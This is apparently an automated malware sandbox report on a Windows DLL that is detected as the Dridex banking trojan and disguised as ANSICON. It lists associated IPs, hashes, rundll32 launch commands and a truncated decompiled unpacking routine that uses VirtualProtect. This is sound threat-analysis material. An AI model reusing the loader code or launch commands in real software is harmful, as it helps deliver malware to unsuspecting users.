Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.evad.winDLL@8/4@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 54.9% (good quality ratio 51%) Quality average: 78.9% Quality standard deviation: 29.3%
HCA Information:	Successful, ratio: 82% Number of executed functions: 27 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, WerFault.exe, wermgr.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
159.203.93.122	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	u3A1eWFqLE.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
50.116.27.97	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	u3A1eWFqLE.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
94.247.168.64	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	u3A1eWFqLE.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	IHUVPJ4hXu.dll	Get hash	malicious	Browse	159.203.93.122
	CTkT1fRtQv.dll	Get hash	malicious	Browse	159.203.93.122
	BJKPKLUPiD.dll	Get hash	malicious	Browse	159.203.93.122
	RuRxpMUPN7.dll	Get hash	malicious	Browse	159.203.93.122
	u3A1eWFqLE.dll	Get hash	malicious	Browse	159.203.93.122
	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	159.203.93.122
	CTkT1fRtQv.dll	Get hash	malicious	Browse	159.203.93.122
	BJKPKLUPiD.dll	Get hash	malicious	Browse	159.203.93.122
	RuRxpMUPN7.dll	Get hash	malicious	Browse	159.203.93.122
	qMus8K6kXx.dll	Get hash	malicious	Browse	159.203.93.122
	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
LINODE-APLinodeLLCUS	IHUVPJ4hXu.dll	Get hash	malicious	Browse	50.116.27.97
	CTkT1fRtQv.dll	Get hash	malicious	Browse	50.116.27.97
	BJKPKLUPiD.dll	Get hash	malicious	Browse	50.116.27.97
	RuRxpMUPN7.dll	Get hash	malicious	Browse	50.116.27.97
	u3A1eWFqLE.dll	Get hash	malicious	Browse	50.116.27.97
	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	50.116.27.97
	CTkT1fRtQv.dll	Get hash	malicious	Browse	50.116.27.97
	BJKPKLUPiD.dll	Get hash	malicious	Browse	50.116.27.97
	RuRxpMUPN7.dll	Get hash	malicious	Browse	50.116.27.97
	qMus8K6kXx.dll	Get hash	malicious	Browse	50.116.27.97
	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
GLESYS-ASSE	IHUVPJ4hXu.dll	Get hash	malicious	Browse	94.247.168.64
	CTkT1fRtQv.dll	Get hash	malicious	Browse	94.247.168.64
	BJKPKLUPiD.dll	Get hash	malicious	Browse	94.247.168.64
	RuRxpMUPN7.dll	Get hash	malicious	Browse	94.247.168.64
	u3A1eWFqLE.dll	Get hash	malicious	Browse	94.247.168.64
	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	94.247.168.64
	CTkT1fRtQv.dll	Get hash	malicious	Browse	94.247.168.64
	BJKPKLUPiD.dll	Get hash	malicious	Browse	94.247.168.64
	RuRxpMUPN7.dll	Get hash	malicious	Browse	94.247.168.64
	qMus8K6kXx.dll	Get hash	malicious	Browse	94.247.168.64
	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_df981a55c8f8470f11a916e355cc03ffb76ef3e_160cf2be_125a4627\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	9204
Entropy (8bit):	3.7600304336234096
Encrypted:	false
SSDEEP:	96:e8N9JDyiXyQhy9hA2mC5Q56tpXIQcQ6c6n+hcEZcw3P+a+z+HbHgYF6eugtYsaV+:dpDSQENHUb+hjbjlhq/u7sgS274Itb2E
MD5:	294404CE438D65E89E0E08CE194A59AF
SHA1:	702990D0939CF98A1E8D89DC2120A7B70A825EDE
SHA-256:	10844F50E5579F2DAD14BC2A681A71C28016B81CBCA360CB7D27CBEC101CB430
SHA-512:	F545593FFBF73FACDA0949B8BBD2C81BF7805AB3F730F0C234247AF8D4217A5365928B403DD9BC4F3051404A35D563ED7B756A36E8D82E2DD298201F4FC4ECBE
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.3.7.5.2.9.1.2.9.2.2.7.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.d.0.a.e.b.2.-.c.8.9.b.-.4.6.e.0.-.a.1.8.5.-.e.4.7.6.9.e.8.b.a.f.2.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.1.f.0.d.4.b.8.-.d.7.1.3.-.4.3.b.a.-.9.3.c.2.-.5.e.c.9.2.5.c.7.4.6.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.d.c.-.0.0.0.1.-.0.0.1.6.-.6.1.4.1.-.6.f.b.5.b.1.3.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3493.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Apr 20 06:54:53 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	24562
Entropy (8bit):	2.644734987334282
Encrypted:	false
SSDEEP:	192:bTNLyF1bPwID4safgG119spMTCjokcsNRIZ:VwbPwyMHumTCjTwZ
MD5:	5258382F2F8DF2ECDB175AEEB3B92647
SHA1:	E62A5F00F4A93C66080DFD57B2B3244840CCF372
SHA-256:	4CC754E098780CCCA642668BB3200245653A88C07DAD4C923052DBE5CC3009FD
SHA-512:	B373A8529858356B4C58FA82D1AB9287ADD4EAC40E04CA32283E57F53EECD7F6A5190C7C708D7A49B87D5A4F426923FC39E89BD19A64B1FD16911AD7620492CD
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........z~`...................U...........B......,.......GenuineIntelW...........T...........$z~`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D5E.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8360
Entropy (8bit):	3.6889551943534546
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiwh6zPAh6YILSU7xNhGgmfyPS1lqCpBv89bkG4sfYpiMm:RrlsNiW6zAh6Y0SU7x6gmfyS1ykGrfYS
MD5:	4CEFA7E40E8E9B43C8887F9F621214D2
SHA1:	17BA3CB0D65F3B9FCFF16BCB1430414C729335B8
SHA-256:	92A2EBD454F3B2E795691F8E84F3CB6D4980FA07A340F459CB4C60E56B0A53EE
SHA-512:	6F5F4F332012BA0E8FEBF5577A9504A9915602867AD1CF6BCDC3DAC1F6E1AE68E61674AB365EB6EE0BF10393EDE5416BE1706A08BE1B961A46CFC0853E865AA1
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.4.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FF0.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.427167083511086
Encrypted:	false
SSDEEP:	48:cvIwSD8zs1JgtWI9lhWSC8Ba8fm8M4JVpFMu+q8v7ZKcQIcQw6UrFd:uITfP2wSNNJKuKlKkw68Fd
MD5:	264A10065F87498AAE2FECF2CF186448
SHA1:	64307CDAAF3D101C10DE8A1C21E9444C22EE475B
SHA-256:	8C6409D9E24E26A9BB03CE8FB5A984F0BB211159EFB2E5C9B1B3C986E346EF60
SHA-512:	01AC2230D177139B826481B795CF1F9E60990C937A3D0D9BFF98C4D84C453934D69904932EBB77B7272DD1E0F6C21D3EB39E531E7CC18B739204056274808492
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="954245" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.5485616542261464
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	u3A1eWFqLE.dll
File size:	163840
MD5:	13272e189ce1c61b9a7c3660ea94ab2a
SHA1:	3593c7bb4229f1e822839c11ab3713c970b584e4
SHA256:	2e3dc149c4384b79a6f19305efa6762602100b568c4a73b88ce3b714644ed849
SHA512:	cf50dac59f240c944d8cf68cac68fc4513e0caea05f386f3b7ab741fc43fb6a2c49d3c358be76ba80406bd4f28ff6926f68c3748b48a3aeb4a9fa842696b248c
SSDEEP:	3072:sWX2IjzzpM+PncPeY8+O3AU3HRIHPh3UGfXy0BHNkIv/ScbQQ2y0iNM0+y+N0tc:s42IfzNPnoeY8j3AsHGPXpHNj6rByM3
File Content Preview:	MZ......................@...........................................[}..[}..[}..[}...}..@.2..\|..=.T..}....S.z\|..@..._}..\|...T\|..V/C..\|..V/E..\|..Rich[}..............PE..L.....}`...........!.........f.......D.......P....@....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x424410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607DE4E0 [Mon Apr 19 20:15:28 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b84fd50f2389cfd5bd83e2cf062986d1

Entrypoint Preview

Instruction
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp edx, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
je 00007F1F04D8019Bh
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1001	0x0	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2768c	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25040	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2356e	0x23600	False	0.761560015459	data	7.55877156847	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x2842	0x2a00	False	0.791573660714	data	7.53164670284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x28000	0x3588	0x1600	False	0.783380681818	MMDF mailbox	7.34765964879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x340	0x400	False	0.390625	data	2.73456990044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x14c	0x200	False	0.62890625	data	4.21021599876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x2e0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, OpenSemaphoreW, LoadLibraryExA, GetModuleHandleW, OutputDebugStringA, GetProfileSectionW
OPENGL32.dll	glTexSubImage1D
ole32.dll	CreateStreamOnHGlobal
USER32.dll	TranslateMessage
ADVAPI32.dll	RegLoadAppKeyW

Version Infos

Description	Data
LegalCopyright	Freeware
InternalName	ANSI32
FileVersion	1.66
CompanyName	Jason Hood
Comments	http://ansicon.adoxa.vze.com/
ProductName	ANSICON
ProductVersion	1.66
FileDescription	ANSI Console
OriginalFilename	ANSI32.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5340 Parent PID: 5580

General

Start time:	23:52:20
Start date:	19/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll'
Imagebase:	0x150000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5328 Parent PID: 5340

General

Start time:	23:52:20
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3220 Parent PID: 5328

General

Start time:	23:52:20
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1
Imagebase:	0x330000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5272 Parent PID: 5340

General

Start time:	23:52:47
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',ReadLogRecord
Imagebase:	0x330000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000002.620248864.0000000073321000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4612 Parent PID: 5340

General

Start time:	23:54:49
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 412
Imagebase:	0x11f0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5340 Parent PID: 5580 loaddll32.exeCOMMON

Executed Functions

Function 00EC2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00EC2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0xec4418 = 1;
				asm("movaps xmm0, [0xec3010]");
				asm("movups [0xec4428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E00EC2569();
				E00EC1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E00EC2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
